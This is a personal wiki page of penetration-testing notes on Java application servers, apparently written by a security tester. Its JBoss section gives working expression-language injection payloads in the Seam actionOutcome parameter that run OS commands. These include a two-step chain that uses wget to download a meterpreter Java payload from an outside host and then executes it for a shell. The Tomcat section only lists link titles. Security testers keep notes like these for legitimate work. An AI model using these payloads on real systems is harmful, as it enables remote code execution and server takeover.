Java App Servers

From Rory.wiki

Jump to: navigation, search

JBOSS

Good doc on JBOSS hacking

Auth bypass on JBOSS

Code Execution on JBOSS-Seam servers

Per [1] It's possible to get remote code execution via JBoss EL interpretation in the actionOutcome parameter. Interestingly when I followed through the setup from this blog, the final PoC didn't work for me but from this post on stackoverflow the following exploit did

on linux this command works ok 

 actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('mkdir%20/tmp/pwned')}

on windows this one does 

 actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('c:/windows/system32/notepad.exe')}

Worth reading the original blog post to get the process for confirming which method of the array is used (the [6] ) in the above line, as apparrently it can be different from OS to OS

commands for getting shell on linux using a java meterpreter payload 

 /seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('wget%20-O%20/tmp/lin.jar2%20http://www.mccune.org.uk/lin.jar')}

 /seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('java%20-jar%20/tmp/lin.jar')}


Tomcat

XSS in calendar sample

List of CVEs for Tomcat 5

List of CVEs for Tomcat 6

List of CVEs for Tomcat 4

Retrieved from "http://wiki.mccune.org.uk/index.php/Java_App_Servers"
Personal tools